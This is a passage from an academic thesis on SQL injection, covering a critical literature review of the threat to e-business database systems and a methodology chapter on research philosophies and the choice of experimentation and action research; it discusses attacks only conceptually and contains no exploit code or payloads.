a bit irrelevant to spend time learning about systems architectures, applicational
topologies and security models. And that is true if, and only if, the attack scope is
reduced only to the data stored on the database serving the Web application. However,
the scope of SQL Injection can extend far beyond data manipulation and expand to the
RDBMS itself, from there to the operating system of the database server, and from there
to the entire corporate network system. This will be neatly demonstrated on the
Experimenting chapter. However, this will only be effective if the attacker understands all
of the different subjects mentioned above and knows his way around those topics. As
Heterogeneity and Change demand for Interoperability and are in great measure
responsible for the SOA paradigm shift, the pressure cascades down to the security
models. Nowadays it is unthinkable not to have an integrated authentication mechanism
which is transversal to the whole corporate IT environment, simply because it would be
impossible to manage such an environment. One product of this pressure is the
Lightweight Directory Access Protocol (LDAP) which defines a standard for organizing

FINDINGS
directory hierarchies and interfacing to directory servers. If from one end Integration and
Interoperability represent the answer to Heterogeneity and Change, it could also mean
that once a weakness is exploited its consequences could potentially propagate to the
entire corporate IT environment, including core legacy systems as established earlier.
Furthermore, logical attacks are in general harder to detect and protect against
(Landsmann & Strömberg 2003;OWASP 2006;Spett 2002) than networking attacks. This
is a classical case where technology cannot solve business problems. So the answer must
live elsewhere, away from a technology-centric view of the problem. This is usually the
time when principles, frameworks and guidelines tend to provide a good insight into
what the solution might be, as for example the least-privilege principle. Howard and
LeBlanc (2003) propose a set of four principles that explain why the advantage is always
on the hacker’s side, and therefore, it may provide a good insight on how to look into
security on the Wild Wild Web:
>
THE DEFENDER MUST DEFEND ALL POINTS; THE ATTACKER CAN CHOOSE THE WEAKEST POINT
Pretty much like on a castle assault, the defender has many defences at his
disposal and many places where he can suffer an attack. On the other hand, the
attacker only needs to focus a single vulnerability and exploit it. This is why
hardening systems is so important.
>
THE DEFENDER CAN ONLY DEFEND AGAINST KNOWN ATTACKS; THE ATTACKER CAN PROBE FOR
UNKNOWN VULNERABILITIES
Software can only be shipped with defences from pretheorized or preunderstood
points of attack. The added value of this work is to address this issue.
>
THE DEFENDER MUST BE CONSTANTLY VIGILANT; THE ATTACKER CAN STRIKE AT WILL
Monitoring systems is a tedious time-consuming task, whereas the attacker can
remain unnoticed, waiting for the right moment.

FINDINGS
>
THE DEFENDER MUST PLAY BY THE RULES; THE ATTACKER CAN PLAY DIRTY
Although in software development this is not always true, while the defender has
access to some white-hat tools, the attacker can use any intrusion detection tool.

CRITICAL ANALYSIS
CRITICAL ANALYSIS
The literature review procedure herein carried-out is of critical nature in detriment to
self-study, historical, theoretical, methodological and integrative types of review. The
purpose of this section is to argue critically on the findings yielded by the review spiralling
process in order to try to address questions such as “what lessons can immediately be
taken?”, “which approaches can immediately be discarded due to low expectations?”,
“which are the major areas surrounding the topic?”, “what additional research is there to
be carried-out in this field?”, and “how does this work relate to others in this field?”.
4 Lessons Learned
It has been clearly established that there are no dissonant voices when it comes to
characterizing SQL Injection and the underlying factors responsible for its existence. This
consensus extends to the devastating impact it may cause on organizations, although
literature sources vary quite a bit in terms of in-depth knowledge and internal evidence.
Regardless of for how long SQL Injection has been around, and no one can clearly state
an exact time span for its appearance, the harmony across literature sources allows to
conclude that is safe to state that the Web-shift associated with the e-Business paradigm
added a whole new dimension to the problem. Many business processes were migrated
to a webbed context, new Web-based services were offered, but core legacy business
systems and line of business applications otherwise very well guarded within the heart of
the corporate it infrastructure were now, even if indirectly, exposed to an external and
quite often public environment although they were never initially designed to withstand
such demand. Furthermore, the Web context is known to be a rapid changing
environment where time-to-market plays a very important role. For this matter, Web

CRITICAL ANALYSIS
applications tend to undergo rapid development cycles, hence augmenting the risk of
cascade errors that can span all the way down to the core business systems. Relational
database management systems (RDBMS) constitute the foundation stone where
e-Business is founded upon as it would be impossible to implement the inherent
dynamics of e-Business without data and data management. Whenever there is a
dynamic Web application, for sure there is at least one RDBMS standing behind it, yet, in
the vast majority of cases, the Web application and the RDBMS are part of a broader
reality which is the corporate IT network. Undermining one system could potentially
jeopardize the whole corporate IT tissue. Because RDBMSs are all over the place and also
because data is the fuel of e-Business, these systems are a tempting target for anyone
wanting to take advantage of any vulnerability.
Literature also establishes that the existing security mechanisms concentrate on the
networking level. Logical attacks, the class of attacks SQL Injection belongs to, can
literarily shatter corporate investments in IT security as these mechanisms are still in the
early stages of addressing these classes of attacks.
In light of the findings it is also possible to conclude the topic is still poorly studied,
obscure, hard to detect and even harder to prevent. Pre-emptive countermeasures in this
field have been neglected and there is a research emptiness surrounding the topic.
Though there are some pioneer projects, guidelines and principles that help to minimize
the threat, there is no consistent set of systemized procedures available.
SQL Injection is not tight up to any particular RDBMS product or vendor, instead, it is a
side effect of the tight-coupling between e-Business architectures and RDBMS which
implement SQL as their fourth generation programming language. The scope of the
problem is broadened by the fact RDBMS and data-driven applications, such as Web
applications, are part of the corporate IT network environment

CRITICAL ANALYSIS
4 Direct Implications
A survey of the existing definitions for the research topic has revealed that no formal
unifying definition has been proposed. All the sources try to formulate a definition at the
expense of the effects, causes and inner workings of this technique. Furthermore, the
danger of this strategy for defining it resides on the fact there are unlimited variations of
SQL Injection attacks (Álvarez & Petrovic 2003). The rationale behind why no formal
definition could be found in literature could be attributed to the fact the topic is still
poorly studied (Landsmann & Strömberg 2003). Based on the findings yielded by this
literature review and produced during the course of this research, a formal definition
must be attempted as part of the proposed taxonomy.
This absence of a unifying definition denotes a broader sad reality. The obscurantism that
has been surrounding the research topic does contribute a lot to the lead of the hacking
community. If there is a direct implication that comes out of the literature review process
is that in order to proceed with effective countermeasures it is absolutely necessary to
systemize the threat, thus empowering others to build on top of this knowledge.
4 Refutation of Arguments
Although Wikipedia (2006f) provides a good entry-level definition of what SQL Injection
is about, the statement that «SQL Injection (…) occurs in the database layer of an
application» is not accurate. Literature indicates that even though the database layer is
the end target, SQL Injection is only possible due to flaws in the input validation logic of
an application, hence, the business layer is the one that is in fact faulty (consult Figure 8 -
Classic Three-Tier Web Architecture Model on page 40). Once the foothold is established
on the database layer, then the attack could expand to other areas of the IT tissue.

CRITICAL ANALYSIS
Another common mistake committed by several literature sources is to depict SQL
Injection as a Web-only problem. Enough internal evidence has been presented to point
out that SQL Injection is a product of the most commonly used set of technologies and
architectures. Of course the role of a webbed context adds a whole new dimension to
the problem making it impossible to mention SQL Injection without ever referring to its
role on the e-Business paradigm. Still, every Web Application using a relational database
can theoretically be a subject for SQL Injection attacks (Landsmann & Strömberg 2003).
In regards to the underlying causes for SQL Injection, some sources state that SQL
Injection is the sole result of faulty programming techniques, and ultimately the
developer’s fault (Waymire 2004), and for that matter solving this threat is a rather
simple task (SPI Labs 2003). Literature as a whole strongly disagrees this viewpoint,
although it acknowledges the paramount role policies and principles play in the scene.
Nonetheless, the SQL Injection problematic is far more complex and considerably less
easy to fix as organizational, technological and methodological factors have also to be
taken into account (see Figure 10 - Summary of the Causing Factors of SQL Injection on
page 43).
4 Paramount Topics Surrounding SQL-Injection
• Information Security;
• Security in e-Business;
• Coding Practices;
• Logical Attacks;
• Code Injection;

CRITICAL ANALYSIS
4 Additional Research
The literary fonts yielded by the literature spiralling process were of technical nature,
which is inline with this work’s goals. Yet, it has been observed a tremendous lack of
materials that approach the SQL Injection threat from a management-centric perspective.
For those who believe, this researcher included, that the sole purpose of IT is to address a
specific business need, any analysis around SQL Injection will only be complete if both
technical and business factors are included. This researcher firmly believes that additional
research on the impact of SQL Injection on organizations will be a valuable asset in
understanding the full extent of the SQL Inject threat.
But there is still much to be done in the technical field. It seems that only minimal
resources are invested in developing security standards and in-built security measures in
Web applications (Landsmann & Strömberg 2003;Viega & Messi 2004). This work’s main
goal is to expose the threat so that additional Knowledge can be built on top of it. This
Knowledge should encompass standards, policies and procedures that can leverage from
existing countermeasures and methodologies in order to ensure a complete and unifying
remedy to SQL Injection.
It would certainly be worthwhile to investigate how new methods of pattern analysis
could be incorporate into existing Intrusion Detection Systems (IDS) in order to better
asses if an SQL Injection attack is in place and stop it.
Finally, SQL Injection has a lot to do with runtime interactions and behaviours which are
by definition difficult, if not impossible, to predict. This seems to be a good research field
for applied heuristics.

CRITICAL ANALYSIS
4 Projects In This Area
At present time the topic is still rather obscure, and one cannot say there is a
consolidated attack front for addressing or characterizing the problem. However it is clear
the industry has awakened to the problem and that some built-in countermeasures are
being included. Apart from what the industry is currently pursuing, two independent
projects surface as a real effort for addressing the SQL Injection threat:
• The Open Web Application Security Project;
http://qb0x.net/papers/MalformedSQL/sqlinjection.htmlSecurity in e-Business;
• The Open Web Application Security Project; http://www.owasp.org/.

CONCLUSIONS
CONCLUSIONS
Since the literature review process herein carried-out is of critical nature, it is already
possible to draw some conclusions that can be formulated from the internal evidence
presented in this review. This first wave of conclusions is of high importance as it may
influence the formulation of this research’s methods and therefore devising conclusions
at this stage is highly desirable.
Literature suggests that the hacker community is one step beyond IT security, at least,
when it comes to logical attacks such as SQL Injection. Signs of reducing that gap are
scarce as it seems that only minimal resources are being invested. Contributing to this
gap, the lack of academic literature on the subject contrasts with the number of rich and
ingenious resources available scattered across hacking sites and underground
communities. This has made the topic a rather obscure subject, yet it constitutes a serious
threat to any organization that heavily relies on information systems to conduct its trade.
Internal evidence also makes possible to conclude that SQL Injection attacks were not
made possible due to any inherent flaw on any vendor specific relational database
management system, being rather the result of the commonly used set of practices and
systems architectures over the past few years.
The decoupling of any specific vendor or RDBMS product broadens the scope of SQL
Injection to virtually any e-Business systems in the world, in fact, the increasing growth of
database-enabled Web applications, the backbone of e-Business, is the great responsible
for the proliferation and success of this threat.
In summary, at present time virtually any database-dependant information system can be
a target for SQL Injection, consequently compromising all systems and information assets
within the same security boundary, yet safeguarding these attacks is still cumbersome.

Chapter 3
METHODOLOGY
Each method, tool or technique has its unique
strengths and weaknesses. There is an inevitable
relationship between the collection of methods employed
and the results obtained. Research should then be looked
upon as a highly creative process, where it is necessary to
comprehend and reflect, before taking action.
This chapter begins by providing an overview of the existing set of research
philosophies, research approaches, research strategies, time horizons, and data
collection methods. These will then form the basis of the research methods to be
applied on this work, culminating in a research methodology which is to address
the objectives previously set out, and ultimately provide the means to answer to
the research question.

methodology •
RESEARCH STRATEGY
RESEARCH STRATEGY
The research strategy used for reviewing literature on research methods to form the basis
for establishing this work’s research methodology was nowhere different from that used
for reviewing literature on the research topic.
This strategy is described in great detail at the very beginning of the Literature Review
chapter on page 23 and taking into account the context differences between the two
research subjects, no other differences are to be noted apart from the search terms used.
For this particular research, these were the collection of search terms used:
• Research methods;
• Research methodology;
• Qualitative;
• Quantitative;
• Positivism;
• Interpretivism;
• Experimentation;
• Induction;
• Deduction;
• Action Reseach.

methodology •
FINDINGS
FINDINGS
The following diagram is a consolidated overview of the dominant research philosophies,
techniques and approaches found on literature, but equally important, it also depicts
their ontological relative positioning:
Realism
Sampling
Secondady Data
Observation
Interviews
Questionnaires
Case
Study
Grounded
Theory
Survey
Interpretivism
Positivism
Dedutive
Inductive
Experiment
Ethnography
Action
Research
Longitudinal
Cross Sectional
Research
Philosophy
Research
Approaches
Research
Strategies
Data
Collection
Methods
Time
Horizons
Figure 25 - The Research Process “Onion”
Though it would neatly serve as a wrap-up summary of this section, it also serves as a
good starting point as it can be used as a navigation charter whenever the inner subjects
are referenced. Hence, the approach taken when describing the research methods
yielded by the literature research process will be from outside-in, and from top-bottom.

methodology •
FINDINGS
4 Research Philosophies
Research philosophies constitute the foundation stone on which the researcher will build
his quest for Knowledge. Research philosophies are ultimately tightly-coupled to the
researcher’s way of thinking as to what is the best philosophy to address the research
question (Saunders, Lewis, & Thornhill 2003). Though at first glance this statement seems
a bit innocuous, yet, the way one thinks about the process of doing research will, even if
unwillingly, affect the way research is conducted.
On opposing sides, positivism and interpretivism, respectively also known as quantitative
research (Baskerville 1999) and qualitative research (Wixon 1995), are nowadays
accepted as equally worthy philosophies in the quest for Knowledge (Avison et al.
1999;Dawson 1999;Saunders, Lewis, & Thornhill 2003). However, there are disaccording
voices. Many young researchers (and some experienced as well) have erroneously
deemed qualitative research as not as valuable as quantitative research (Dawson 1999).
This can be partially explained by the great tradition quantitative research has in the
Natural Sciences midst. Conversely, when the Human factor is introduced, e.g. Social
Sciences, quantitative research fails to adequately address all aspects of the research
scope and qualitative research is more and more used (Hancock 1998). Between these
two philosophies stands critical realism, attempting to combine the best of two worlds.
4Positivism
Alavin & Carlson (1992) cited by Baskerville (1999) indicate that a considerable
percentage of all research conduct in the field of Information technology is of positivistic
nature. They based their claim on the observation of several US scientific journals and the
research methods employed on the published papers. Positivistic research, also known as
the Scientific Method, is based on the notion that the researcher is objective,

methodology •
FINDINGS
independent and completely detached from the research subject. Results will therefore
be valid, credible and replicable by anyone else who undertakes the same steps
(Baskerville 1999;Gephart 1999a;Saunders, Lewis, & Thornhill 2003).
According to Kenneth (2001), this research philosophy deals with three vectors:
Describing, Prediction and Control. For a positivistic approach to take place it is necessary
to formulate a model for describing the problem, which in turn implies the existence of
variables. These are isolated through environment control, e. g. samples, in order to
breakdown the problem and attempt to formulate new models based on new
interactions of the same variables within various environments. The resulting Knowledge
will depict reality as per the formulated model and consequently be able to predict future
behaviours within a well-defined context.
Sarker & Lee (1998) cite Lee (1989) , Yin (1989) and Miles & Huberman (1994) as to
what guidelines for ensuring rigor of the research process should be followed:
• Construct validity:
Ø Using multiple sources of evidence;
Ø Having key informants review the case study report;
Ø Maintaining a Chain-of-Evidence;
• Internal validity;
• External validity;
• Reliability.
So positivism is all about finding the right model to describe a well-defined reality,
typically the scenario posed to a Natural Sciences’ researcher. Baskerville (1999) states
that for this reason, positivism fails to properly address realities that cannot be
well-defined, for example, when the randomness of the human behaviour is part of the
system under study, thus frustrating any chances of Prediction, not to mention Control.

methodology •
FINDINGS
4Critical Realism
Realism is based on the premise that reality exists regardless of any human thoughts or
beliefs. In the field of Social Sciences and management, according to Saunders, Lewis, &
Thornhill (2003), critical realism can indicate «that there are large-scale social forces and
processes that affect people without their necessarily being aware of the existence of
such influences on their interpretations and behaviours».The same source suggests that
business and management research is often a mixture of positivism and interpretivism
and that critical realism can provide a new insight into studying these fields.
4Interpretivism
Whitman & Woszczynski (2004) argue that a qualitative research is such that an
interpretive analysis is used to study research subjects in their natural environment, thus
placing the researcher “on the field”. Qualitative research explorer attitudes, behaviours
and experiments through the use of several data collection methods, such as interviews
and case-studies, and tries to capture the participants’ view points (Dawson 1999).
Kenneth (2001) refers four keypoints that must be taken into account whenever
qualitative research is used: a) definition of truth; b) determining the human-related
scope; c) definition of the researcher’s role, and d) the perception of the different
contributions. Defining the reliance interval for which the findings can be deemed as
applicable seems similar to the definition of a model used in positivistic research.
However, the challenges are completely different. Factors such as time period, place,
persons involved, amongst others, may never be replicated again. If broader factors are
taken into account, for instance the environment of a particular business situation,
replication is just impossible, hence, findings will only be true on a well-defined
time-localized context. In regards to the second keypoint, scoping the human-related

methodology •
FINDINGS
factors will provide input for the definition of what the study environment is. The
definition of environment will in turn determine the truth interval of the findings. About
the researcher’s role, unlike positivism, the researcher in not detached from the reality
under study. In qualitative research, the researcher is not comfortably sitting on a chair
analysing test subjects using a microscope, instead, he is on the Petry dish poking,
questioning, and interacting with them. Defining the researcher’s role will relate back to
the reliance interval of the findings. Finally, having a clear perception of each individual’s
contributions to the grand picture will enable to extrapolate a broader reality from a
subset of research subjects. Although there are some rare cases, access to the complete
universe under study is not feasible if not totally impossible.
Unlike positivism, the Knowledge gained during research cannot predict future events as
all the “variables” cannot be replicated as well. Though it may seem to be a handicap,
interpretivists argue that generalisability is not of crucial importance (Saunders, Lewis, &
Thornhill 2003). Furthermore, the sum of the Knowledge gathered by various researches
with their unique insight into their little piece of reality will add bits and pieces to the
broader ecosystem in what is known as Social Constructionism. This proximity between
the researcher and research subjects, and the fact the resulting Knowledge cannot be
widely applied in predicting future events, raises a legitimate concern about the credibility
of the results obtained. A response could be the wide acceptance of the interpretivistic
community of replication as a credible means of confirming the results of any given
qualitative research (Whitman & Woszczynski 2004). The lack of a well-defined model of
“laws” to which social interactions ought to obey, as opposed to Natural Sciences
(Saunders, Lewis, & Thornhill 2003), is what stands behind interpretivism. Like neuronal
networks, where a model describing the interactions, inputs, and outputs is unavailable,
only replication can provide the means for obtaining and consolidating Knowledge.
Whitman & Woszczynski (2004) argue that for this very reason, interpretivism should also

methodology •
FINDINGS
be applied to Information Systems research. They back this statement up with a citation
from Hirschheim (1992) where he states that the epistemology of Information Systems is
in great measure based on Social Sciences since Information Systems are in great
measure sociable systems instead of technical. This position is also reinforced by a citation
to Lee (2001) who claims that the real challenge lays in capturing the interactions
between technology and human behaviours; pretty much like what happens during a
chemical reaction.
4 Research Approaches
Research approaches divide into two distinct groups: Deduction and Induction.
Deduction is of positivistic nature, whereas induction of interpretivistic inspiration.
4Deduction
Since deduction relates back to the second layer of the onion that is being pealed out, it
implies that a previous decision in terms of research philosophy has to have been made
prior reaching this level. Deduction requires the definition of a theory and the formulation
of a hypothesis that will be tested. Robson (1993) cited by Saunders, Lewis, & Thornhill
(2003) enumerates five consecutive steps, which could be followed recursively if
necessary, deductive processes should adhere to:
• Formulation of a hypothesis based on a theoretical model;
• Express the hypothesis in operational terms;
• Testing of the hypothesis as per the operacionalization model;
• Analysis of the results;
• If necessary, review the theory so it corroborates the results obtained.

methodology •
FINDINGS
4Induction
Opposing deduction, where the pre-existence of a theory is required, induction seeks out
to build one (Saunders, Lewis, & Thornhill 2003). This way of approaching the quest for
Knowledge places induction perfectly inline with qualitative research (refer to Figure 25 -
The Research Process “Onion” on page 105). In induction, theory will follow data and
not the other way around. Instead of creating a rigid “law” a new space of alternative
possibilities is created (Saunders, Lewis, & Thornhill 2003). As the role of theory
diminishes, test subjects claim that space by gaining more protagonism. Their high
relevance causes that only a few test subjects are included in the study. This paradigm
opposes Yin’s (1989) and Lee’s (1989) directive lines for positivistic research which
include several test subjects as a means of producing internal validation.
4 Research Strategies
As the research process onion is pealed-out the scope of research methods begins to
narrow down toward the definition of a research methodology that fits the research
objectives previously set-out. For this reason, some research strategies and henceforward
related methods yielded by this literature review will not be described in great detail for
those that do not relate to the goals of this research.
4Experimentation
Experimentation is all about cause-effect and is the pinnacle of positivistic research. All
the concerns of positivism, e.g. theory and hypothesis, validity, reliability, etc., apply
directly to experimentation. According to Saunders, Lewis, & Thornhill (2003), a
positivistic research that uses experimentation as its research strategy is composed of six
sequential steps:

methodology •
FINDINGS
• Formulation of a hypothesis based on a theoretical model;
• Selection of test subjects from known populations;
• Allocating test subjects to different test scenarios;
• Introduce planed changes into a limited well-defined set of variables;
• Measuring a limited number of variables;
• Variable control.
In many aspects these bullets are similar to the ones proposed by Robson (1993) in
regards to deduction, which enforces the strong bound uniting positivism, deduction
and experimentation as depicted on Figure 25 - The Research Process “Onion”. In terms
of its application in Information Technology, Lebowitz (1998) suggests that
laboratory-based experimentation is not adequate for this field. He takes his point further
by stating that any Information Technology research that conducts experimentation is
deemed to fail.
4Surveys
According to Hutchinson (2004) this is the simplest strategy for obtaining information,
and questionnaires and interviews are the most commonly used data collection methods
in this strategy. Surveys do offer a good strategy for satisfying the eagerness of positivism
for internal validity. They can theoretically produce vast amounts of data, e.g. as in a
census, which can be used to producing internal validity according to Yin’s (1989) and
Lee’s (1989) directive lines for positivistic research. However, by definition questioners and
similar data collections methods are limited in terms of length which can be an obstacle
to conducting research using this strategy (Saunders, Lewis, & Thornhill 2003).

methodology •
FINDINGS
4Case-Study
Yin (1984) cited by Sarker (1998) defines case-study as empirical research that through
the use of many evidence sources studies a contemporary phenomenon on an ordinary
context where the frontier between context and phenomenon is not clearly defined. This
view is also shared by Robson (2003) cited by Saunders, Lewis, & Thornhill (2003). A
case-study can focus a single individual, a group or an organization, and even an event. It
can also bridge across other case-studies in a way that conclusions can be drown from
the similarities and differences with other cases (Hutchinson 2004). Case-studies stand
roughly halfway in between positivism and interpretivism making it a rather special
strategy as it can be used to corroborate a well-defined theory-based hypothesis and to
infer Knowledge by induction (Saunders, Lewis, & Thornhill 2003).
4Grounded-Theory
This theory emerged in 1967 by the hand of two researchers, Glaser and Strauss. T, and it
aims to combine both deduction and induction toward the formulation of a
consolidated theory (Dawson 1999;Saunders, Lewis, & Thornhill 2003). Unlike
experimentation, the primary input is data and not a theory. From this data a theory in
formulated through induction. The solidity of the theory can then be validated by means
of deduction in a way that the same input data that lead to the formulation of the theory
will be equal to that produced as an output of the execution of that theory (Saunders,
Lewis, & Thornhill 2003). Grounded-theory constitutes the basis of neural networks.

methodology •
FINDINGS
4Ethnography
Ethnography aims at studying the culture of a group and therefore is of highly inductive
nature as expected in Social Sciences. Its primary goal is to address the needs of
Anthropology and do not really apply to an Information Systems scenario.
4Action Research
To Dawson (1999) action research is better understood as more like a methodology than
a research method. The researcher works in close relationship with a group of individuals
and acts more like a facilitator in the quest for a consensus. Because it is all about
humans, co-researching is not a role all of the participants are willing to play throughout
the entire process. For this matter, the group will be undergoing four steps iteratively:
a) planning; b) action; c) observation and d) reflexion. Marsick & Watkins (1997) and
Coghlan & Brannick (2001) cited by Saunders, Lewis, & Thornhill (2003) state that action
research is different from other sources of applied research since in addition to
describing, understating and explaining, its true focus is to promote change, namely
changing groups of people such as corporations. One of the most sounding definitions
for action research has been proposed by Rapport (1970) cited by McDonagh (2004)
who suggest that action research tries to contribute as much to the practical concerns
related to situation, as to the objectives of Social Sciences by means of a mutually
accepted framework of understanding.
Though action research has been interpreted in many different ways, literature references
three distinct aspects (Saunders, Lewis, & Thornhill 2003). The first aspect focuses the
prime purpose behind action research which is change management, Cunningham
(1995) cited by Saunders, Lewis, & Thornhill (2003). The second aspect deals with the
involvement of practitioners in the research, particularly the closeness between

methodology •
FINDINGS
practitioners and researchers. The third and final aspect indicates that the implications of
action research should outreach the immediate project for which it has been conducted
in a way that it is clear its results can be applied in different contexts. Avison et al. (1999)
wrap-up these three aspects by portraying action research as being the combination of
theory and practical knowledge, and of practitioners and researchers, through change
and reflection on an immediate problematic situation by way of an ethical framework
which is reciprocally accepted. Avison et al. (1999) also add that action research is an
iterative process where the parties involved act together on a particular cycle of activities,
problem diagnosis, active participation, or learning reflection. Susman and Evered (1978)
cited by Whitman & Woszczynski (2004) and Baskerville (1999) systemize this cycle into
five steps:
• Diagnosis – Identifying the research question;
• Action planning – Determining which action are to be carried-out in order to
address the research question;
• Action implementation – Conducting and controlling the actions previously
planned;
• Evaluation – Determining if the actions did answer to the research question;
• Lessons Learned – Document the knowledge obtained from the
implementation of the project.
Schein (1995) cited by Saunders, Lewis, & Thornhill (2003) suggests that there are two
motivations for conducting action research. The first motivation is that action research
seeks out to satisfy the interests of those involved in it, which does not necessarily mean
the interests of the sponsor, which in turn does not unavoidable indicate the sponsor will
not benefit from it. The second motivation is triggered by the sponsor who motivated by
a particular need involves the researchers in the hopes of addressing that need.
Regardless of the underlying motivation for action research, the sponsor/owner of the

methodology •
FINDINGS
project is always assisted in gaining new diagnosis skills and problem resolution expertise
on his organization.
4 Temporal Horizons
The underlying question behind temporal horizons, which is tightly-coupled with the
research question, is if the research should be a snapshot of reality taken on a particular
moment, or in contrast, it is meant to address a time period. Figure 25 - The Research
Process “Onion” on page 105 shows how temporal horizons relate to research
philosophies. It is expected that human-related realities are by nature volatile, whereas
findings in the field of Natural Sciences are commonly expressed as “laws” which gives a
rather immutable ring to it. The associated temporal horizons are respectively named
longitudinal and cross-sectional (Saunders, Lewis, & Thornhill 2003).
4 Multiple Methods: Triangulation
According to literature (Dawson 1999;Gephart 1999b;Saunders, Lewis, & Thornhill 2003)
research approaches and strategies do not stand on their own, compartmentalized and
isolated, and therefore, they can be mixed. In truth it is expected that in most cases,
especially in the case of Information Systems, reality cannot be described in terms of
black and white as it is comparable to a shade of different kinds of gray. What better
proof of this statement than the existence of such a prolific set of research approaches,
philosophies, strategies and so forth? Interpretivism is itself the product of a not so
organized reality. Triangulation acknowledges this fact and its base principle is neatly
expressed on the name it has been given. Triangulation takes into account several vectors
of Knowledge produced by different research approaches and even opposite

methodology •
FINDINGS
philosophies, and performs what in radio language is called a triangulation. Radio
triangulation consists on determining the origin of a signal, in this case “the reality”
under study, based on the direction of two or more incoming signals, in this case the
findings produced by several methods. Saunders, Lewis, & Thornhill (2003) define
triangulation as the use of multiple data collection methods as a means to ensure what
the data reveals is what the researcher thinks the data is telling. Jick (1979) cited by
Dawson (1999) adds that on a positivistic research multiple data collection methods
provide inherent benefits and a broader, more representative perspective of the test
subjects. Dawson (1999) argues that although beneficial, the real benefit of triangulation
is the complete absence of pre-imposed restrictions. Saunders, Lewis, & Thornhill (2003)
summarize the role of triangulation, and research methods in general, as a highly creative
process where the researcher’s imagination plays an important role on the quest for
answering the research question.

methodology •
CRITICAL ANALYSIS
CRITICAL ANALYSIS
Similar to the literature review process, the methodology review procedure herein
carried-out is of critical nature. Though a critical approach has already been used
throughout the entire review process, in this section findings will undergo a more
thorough analysis in terms of their alignment to this work’s objectives. However, the
extent of this analysis will not include arguing the validity of the different research
approaches. Therefore the analysis will not dive into considerations on the merit of these
approaches as it is this researcher’s belief, also shared by some literature sources herein
referenced (Saunders, Lewis, & Thornhill 2003), that all research methods are equally
worthy as long they serve the objectives of the research.
4 Lessons Learned
It has been clearly established that there is a rich, mature, and well-established taxonomy
of research methods, approaches, and strategies, and that their relative positioning can
be easily intelligible as per the diagram Figure 25 - The Research Process “Onion” on page
105. This richness does produce enough internal evidence to conclude that studying
some realities, namely the ones which by nature are hard to systemize, is no simple
matter.
Maybe one of the best pieces of advice yielded by this review is Saunders’, Lewis’, &
Thornhill’s (2003) who think of research as a highly creative process where the
researcher’s imagination plays an important role on the quest for answering the research
question. They also state that the inherent research philosophy the researcher is likely to
adopt is in great deal dependant of the researcher’s own pre-disposition toward problem
solving, hence any research is condemned to carry the marking of its researcher. This

methodology •
CRITICAL ANALYSIS
reasoning will probably make some positivists to pull their hair off, but fundamentalism is
rarely the path to enlightenment, so this researcher opts to take Saunders’, Lewis’, &
Thornhill’s (2003) suggestion and look at research methods as a highly creative process
and that each new perspective brought in by new works of different researchers will
add-up to a better collective understanding of the reality under study.
The final lesson taken from this review process is the fact that right or wrong seems not
to exist, instead, things should be put in terms of “does it help addressing any of the
objectives of the research?”. This lesson has a profound impact when formulating the
research methods as it provides the freedom to navigate across the research process
onion at will, choosing the most promising methods for a specific research goal.
4 Refutation of Research Approaches
Dismissal of research approaches will not be made on the basis of the pseudo-merit of
that approach or be influenced by any epistemological pre-judgment, but on this
researcher’s belief on whether it will be useful and feasible to address a specific objective
of this research as per the «Scope» topic under the introductory chapter12
.
• Surveys – Although surveys could be used in determining objectives a) and d),
the literature review process revealed there is enough information already;
• Ethnography – The applicability scope of this approach falls well within the
Anthropology realm;
12
a) Systematize the most commonly used set of practices and systems architectures used for implementing
e-Business platforms;
b) Establish a clear dependency of e-Business systems on relational database management systems;
c) By investigating different variations of SQL Injection and modus operandis, propose a taxonomy
d) Perform experimentation and ultimately answer to the research question;
e) Based on the gained experience, propose simple first line defensive techniques;

methodology •
CRITICAL ANALYSIS
• Case-Study – As per the findings of this review process, the applicability scope
of a case-study is primarily the case under study, although it is highly desirable
that results can be used on different scenarios. In most cases, this can only be
achieved by constructing validity, as for example, having other case-studies
corroborating the results. As established on the introductory chapter and latter
during the literature review process, SQL Injection is a global,
systems-transversal, vendor-agnostic threat and therefore although there is not
a clear objective stating that one of the goals of this work is to build
Knowledge that is cross-sectional, the fact the problem under study is so by
nature, dismisses case-study as an approach. However, frontiers are very thin.
Each time a test subject is used to prove a point or build internal validity,
objective d), isn’t this in fact a case-study in a way?
• Grounded-Theory – This approach stands roughly half-way between induction
and deduction and it requires data in order to build an initial theory. Data is
something that in the present context is just not there, hence it invalidates the
use of grounded-theory;
4 Direct Implications
If to the findings of the review process we add which lessons have been learned and
which approaches have been dismissed, then the outcome is the direct implications.
The first implication is the fact all of critical realism’s defining bastions have been
dismissed indicates that this research will definitely not have any critical realism traces.
The second is that this research relies on ontological opposite approaches,
experimentation and action research, to address its objectives. Literature review plays a
very important role as it directly addresses several objectives and supports others.

methodology •
RESEARCH METHODS
RESEARCH METHODS
As specified in the objectives of this work, the research question clearly requires
experimentation in order to be proven right or wrong, thereby involving sampling of test
subjects and a deductive approach, the far top end of the research process onion. On the
other hand, the real challenge is to develop the supporting taxonomy and subsequently,
out of the experience gained, suggest a first line of countermeasures. Developing the
taxonomy will be a spiralling procedure where the researcher and his know-how play an
enormous part, hence placing him as part of the research process. This means that action
research is used, the opposite far end of the research process onion. Therefore, in order
to answer to the research question, it is necessary to use triangulation, yet, this does not
necessarily mean the secondary objectives are inherently met. For this reason, it makes
sense to consider research methods on a per objective basis.
>
OBJECTIVE I
SYSTEMATIZE THE MOST COMMONLY USED SET OF PRACTICES AND SYSTEMS ARCHITECTURES USED FOR
IMPLEMENTING E BUSINESS PLATFORMS
This objective was already met by the literature review process and the underlying
review of the background description of this research. The findings presented
more than enough information and internal validity to consider this objective met.
>
OBJECTIVE II
ESTABLISH A CLEAR DEPENDENCY OF E-BUSINESS SYSTEMS ON RELATIONAL DATABASE MANAGEMENT
SYSTEMS
Likewise Objective I, Objective II was fully achieved by means of a literature review.
Both these objectives serve to build a strong case why SQL Injection is so relevant
on a global network of runtime interactions as the backbone of e-Business is
relational database management systems.

methodology •
RESEARCH METHODS
>
OBJECTIVE III
BY INVESTIGATING DIFFERENT VARIATIONS OF SQL INJECTION AND MODUS OPERANDIS, PROPOSE A
TAXONOMY
Literature review plays an import role here as a survey of the existing techniques is
required in order to build a taxonomy. Because SQL Injection is still a rather
obscure subject, the literature review process must take into account this fact in its
quest for information sources. Fonts that otherwise would seem inappropriate
must be herein considered, including underground sources, hacking communities,
peer-to-peer networks. This mindset was used on the literature review process as
laid-out on the corresponding chapter. Still, literature review does not offer all the
elements for constructing such taxonomy. The researcher will have to validate
attack variations in terms of category, concept, modus operandis, effectiveness
and applicability scope. This procedure will involve experimentation and poking
around test systems in order to determine the best compartmentalization for the
